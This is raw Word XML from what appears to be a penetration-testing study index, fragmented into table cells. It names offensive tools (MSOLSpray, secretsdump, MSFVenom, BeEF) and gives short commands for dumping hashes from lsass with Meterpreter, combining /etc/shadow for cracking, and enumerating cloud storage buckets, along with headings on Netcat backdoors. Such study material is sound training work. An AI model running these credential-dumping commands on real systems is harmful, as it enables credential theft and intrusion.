                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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MSOLSpray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E7D247A" w14:textId="23BF22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MSOLSpray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1481B3D1" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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API Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9942CB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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FireProx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MSOLSpray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B9ACF3A" w14:textId="76A4AA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MFASweep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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470FB0F1" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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48B3D9C4" w14:textId="77777777" w:rsidTr="00F82307">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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF9905B" w14:textId="2620F0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Account license downgrade:  Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MsoUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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6C15A07A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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620A5389" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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63D9BEF9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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0CB1B35D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Domain Controller Hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22C7C248" w14:textId="58BB8B7A"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ntdutil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  secretsdump.py</w:t>
            </w:r>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Reads password hashes from memory. Migrate to lsass.exe, then dump hashes.  Ps -S lsass.exe  migrate 620  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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aad3b435b51404  NTHASH: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05E69CB7" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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D53B319" w14:textId="3CD6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1C4C0AAB" w14:textId="0B07F2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SHA256-512: 5000 rounds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F82307">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56951692" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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9DC85B6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AFCE78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unshadow /etc/passwd /etc/shadow &gt; combined</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="634AADFC"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
          <w:p w14:paraId="2496350D" w14:textId="430180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13FD491D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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381E28E7" w14:textId="2B9D34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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Hash and Cracking Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0722154E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07C5DDBC" w14:textId="49005D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 - By Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDA568B" w14:textId="2E0B9D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Mask Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B683E24" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABE1126" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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786CF439" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AFB442E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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09284651" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2446E2B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6EADAC2" w14:textId="4E73F6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https://www.googleapis.com/storage/v1/b/BUCKETNAME  https://ACCOUNTNAME.blob.core.windows.net/CONTAINERNAME</w:t>
            </w:r>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1B9745FF" w14:textId="463E6CC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AWS S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CAF1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71AB7D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bucket_finder.rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> words --download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7327EB45" w14:textId="5AF76F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gcpbucketbrute.py -u -k </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gsutil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ls </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>gs</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175B982"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cat </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>namelist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="28E04096" w14:textId="7C5A96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basicblobfinder.py </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>namelist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Listable: enumerate and download  Writable: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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="002810CF" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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62ECABE3" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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4831F38F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43BB172A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A9286AD" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Client Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="380B35F3" w14:textId="01CDF34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Listen Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3593805A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Some Netcat Uses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27BAD4CF" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Data Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ACC2D41" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Port Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DB0EA32" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Backdoors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E722DC2" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Persistent Backdoor Listeners</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118BA607" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Relays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A0736ED" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Make a Netcat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Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23F2D32D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Closing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0857DF25" w14:textId="77777777"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Visual Summary: Netcat</w:t>
            </w:r>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6B90A501" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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40E372C9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2C9F4C22" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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247991D7" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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20C79C2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Metepreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE4FC5F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D9C58B8" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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74304E2D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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779D6CBB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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559E7D17" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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62E70993" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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49D4ABE6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43260DF2" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02972121" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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07839F9F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BeEF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F50541C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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559F26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Building Payloads - Metasploit </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MSFVenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="368408C3" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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1CED585" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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System Resource Usage Monitor Dum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E7ACD6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3258271A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
